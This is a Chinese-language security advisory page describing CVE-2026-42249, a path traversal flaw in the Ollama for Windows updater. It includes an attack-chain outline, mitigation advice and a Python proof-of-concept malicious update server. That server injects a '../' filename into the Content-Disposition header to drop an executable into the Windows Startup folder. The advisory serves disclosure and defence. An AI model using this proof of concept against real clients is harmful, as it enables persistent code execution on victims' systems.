CVE-2026-42249 CVSS 9.8 严重

CVE-2026-42249 Ollama Windows远程代码执行漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42249

漏洞类型

远程代码执行 (RCE)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ollama for Windows

漏洞概述

Ollama for Windows更新机制存在远程代码执行漏洞。因未正确验证攻击者控制的HTTP响应头，程序在下载更新时直接使用头信息构造文件路径，导致路径遍历。攻击者可将任意恶意文件写入Windows启动目录。结合签名验证缺失漏洞，可实现无感知的自动持久化代码执行。

技术细节

该漏洞的核心在于Ollama客户端在处理更新下载时的路径拼接逻辑缺陷。具体而言，当应用请求更新文件时，会解析HTTP响应头中的特定字段，并将其直接传入filepath.Join函数以确定本地保存路径。由于程序未对包含../的路径遍历字符进行过滤，攻击者可通过中间人攻击或伪造响应包，指定恶意文件的保存路径。利用此漏洞，攻击者可将伪造的可执行文件写入受控目录（如Startup文件夹）。更严重的是，该漏洞可与CVE-2026-42248（缺少签名验证）进行链式攻击。由于Ollama执行静默更新且未校验签名，恶意文件会被写入磁盘并后续由系统或更新器自动执行，从而完全控制用户系统，且整个过程无需用户交互。

攻击链分析

STEP 1

步骤1

攻击者通过中间人攻击（MITM）或劫持更新服务器，拦截Ollama客户端的更新请求。

STEP 2

步骤2

攻击者向客户端发送特制的HTTP响应包，在响应头（如Content-Disposition）中注入包含路径遍历序列（../）的文件名。

STEP 3

步骤3

Ollama客户端未经验证直接将恶意头信息通过filepath.Join拼接路径，导致文件被写入Windows启动目录等敏感位置。

STEP 4

步骤4

结合CVE-2026-42248（签名缺失），恶意可执行文件被自动执行或随系统启动自动运行，实现RCE。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Conceptual PoC for CVE-2026-42249
# This script simulates a malicious update server response.

from http.server import HTTPServer, BaseHTTPRequestHandler

class MaliciousUpdateHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Send 200 OK response
        self.send_response(200)
        # Send malicious headers to exploit path traversal
        # Targeting Windows Startup folder via path traversal
        self.send_header('Content-Disposition', 'attachment; filename="../../../../../Users/%USERNAME%/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/payload.exe"')
        self.send_header('Content-Type', 'application/octet-stream')
        self.end_headers()
        # Write malicious payload (dummy content)
        self.wfile.write(b'MZ\x90\x00') # Minimal PE header start
        print("[+] Malicious update response sent with path traversal header.")

if __name__ == '__main__':
    server = HTTPServer(('0.0.0.0', 8080), MaliciousUpdateHandler)
    print("[+] Listening on port 8080...")
    server.serve_forever()

影响范围

Ollama for Windows 0.12.10 - 0.17.5

防御指南

临时缓解措施

建议用户暂时关闭Ollama的自动更新功能，并密切关注官方发布的修复公告。在修复版本发布前，避免在不安全的网络环境下使用该软件，同时检查Windows启动文件夹中是否存在可疑文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-42249
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-42249
3 Details https://www.cvedetails.com/cve/CVE-2026-42249/
4 VulDB https://vuldb.com/cve/CVE-2026-42249
5 Link https://cert.pl/en/posts/2026/04/CVE-2026-42248/
6 Link https://ollama.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表